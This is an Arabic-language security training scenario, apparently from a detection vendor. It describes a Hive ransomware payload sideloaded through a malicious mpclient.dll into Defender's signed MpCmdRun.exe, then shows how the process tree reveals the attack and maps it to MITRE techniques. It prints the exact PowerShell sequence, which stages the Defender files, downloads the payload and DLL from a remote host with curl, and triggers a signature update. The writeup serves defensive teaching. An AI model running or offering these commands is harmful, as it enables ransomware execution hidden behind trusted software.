سيناريو تدريبي - حقن DLL اسم المجموعة بيانات التدريب - حقن Dll (Hive) السيناريو في هذا السيناريو التدريبي، سننفذ حمولة برمجية خبيثة (رانسوم وير) مشفرة عبر حقن DLL في برنامج MS Defender الموقّع رقميًا. تم إنشاء ملف DLL مخصص، كما قد يقوم مهاجم بإنشائه، والذي يقوم بفك تشفير ملف .log وهمي وتنفيذه. تتجاهل العديد من أدوات الأمان ببساطة العمليات التي يبدأها عنصر أب موقّع، لا سيما إذا كان برنامج مضاد فيروسات موقّعًا، وبشكل أخص Defender. فأوامر Defender ليست فقط مسموحة في الغالب، بل غالبًا ما تكون ذات صلاحيات مرتفعة للغاية. هنا، الأمر الذي يتم استغلاله كسلاح هو تحديث للتوقيعات، وهو أمر ليس فقط شائعًا، بل سيتم تجاهله من قِبل أي عملية بحث عن البرمجيات الخبيثة. نوضح هنا أنه حتى مع تقنيات "العيش خارج الأرض" (living off the land) البسيطة، يمكن للمهاجم تنفيذ حمولات ذات صلاحيات مرتفعة من خلال تجهيز نص برمجي بسيط دون الحاجة إلى أدوات حقن مخصصة على الجهاز. فيما يلي النص البرمجي الدقيق الذي تم تشغيله على جهاز الضحية. لاحظ أنه لا يحدث أي شيء ضار بشكل صريح، فنسخ ملفات Defender التنفيذية إلى مجلد تجهيز يتم فقط لإبراز ملفات C:\staging في تحليل السبب الجذري. mkdir C:\staging copy C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.19041.746_none_a39f6d9ab59bd8b7\* C:\staging move C:\staging\mpclient.dll C:\staging\realdll.dll; cd C:\staging curl 169.254.247.102:8000/0x80004006.log -outfile 0x80004006.log; curl 169.254.247.102:8000/mpclient.dll -outfile mpclient.dll ./MpCmdRun.exe -SignatureUpdate تفصيل الأمر سطرًا بسطر: إنشاء مجلد التجهيز نسخ Defender إلى مجلد التجهيز إعادة تسمية ملف mpclient.dll الحقيقي تنزيل ملف "log" المشفر وملف DLL الخبيث من خادم بعيد تنفيذ MpCmdRun الموقّع الحقيقي بمهمة تحديث التوقيعات MpCmdRun.exe التعرف عليه الاستجابة الآلية بدايةً من الاستجابة الآلية، فإن أجراس الإنذار ستدق في ذهنك. عملية لم يسبق رؤيتها من قبل، تحمل اسمًا عشوائيًا (GUID)، تم تنفيذها وأطلقت Cyber Crucible وهي غير موقّعة. ومع ذلك، لاحظ أن المسار هنا كان يمكن أن يكون شيئًا أقل إثارة للقلق في الظاهر. تم تركه عمدًا كـ C:\staging لإبرازه. الخطوة التالية الفورية ستكون العثور على ذلك الملف ومعرفة كيف وصل إلى هناك. من المرجح أنه تم حذفه تلقائيًا، لكن يمكننا الرجوع إلى سجلات إنشاء العمليات في Cyber Crucible لمعرفة من قام بتشغيله في المقام الأول. Powershell → MpCmdRun → {7374F…} تمامًا كما هو موضح في السيناريو أعلاه، بدأ نص برمجي بلغة powershell ملفًا تنفيذيًا لـ Defender، والذي بدوره أطلق عمليتنا المخيفة. ثم أطلقت الحمولة الخبيثة العديد من العمليات الفرعية للقيام بمهام تجهيز متنوعة. غالبًا ما توفر الرؤية على هذه العمليات الخلفية نظرة ثاقبة على الملفات التي تم إنشاؤها على النظام، ومفاتيح السجل التي تم تعديلها، ونشاط الانتشار الذاتي (worming)، وما إلى ذلك. سلوك كان سيبقى "غير مرئي" لولا ذلك في هذه المرحلة، تم احتواء الهجوم بواسطة Cyber Crucible، ولكن تحليل العمليات ذات الصلة أمر مهم لتحديد نطاق السلوكيات الخبيثة. قد يبدو تنفيذ الملف التنفيذي غير الموقّع وحده أمرًا واضحًا عندما يعرضه Cyber Crucible، ولكن في كثير من الأحيان يتم ببساطة تجاهل العمليات الخلفية التي يبدأها برنامج يتمتع بصلاحيات وحماية مثل Defender. الوثائق ذات الصلة Mitre T1543 - يمكن أن يؤدي إنشاء أو تعديل عملية نظام إلى تمويه الشيفرة الخبيثة كعملية نظام عادية وموثوقة أمام أدوات الكشف عن البرمجيات الخبيثة. Mitre T1068 - يمكن أن يتيح تنفيذ تصعيد الصلاحيات عبر الثغرات البرمجية للشيفرة الخبيثة الإفلات من قيود الصلاحيات أو من البيئات الافتراضية. Mitre T1055-001 - يمكن استخدام حقن DLL لتحميل شيفرة خبيثة في عملية ما، إما بتوجيه العملية المستهدفة ببساطة لتحميل ملف DLL جديد أو باستبدال ملف DLL شرعي قبل تحميله. Mitre T1059-001 - غالبًا ما تستخدم البرمجيات الخبيثة الخاصة بـ Windows أداة PowerShell لتنفيذ إعداد البرمجيات الخبيثة، مثل استبدال الملفات الشرعية بملفات خبيثة.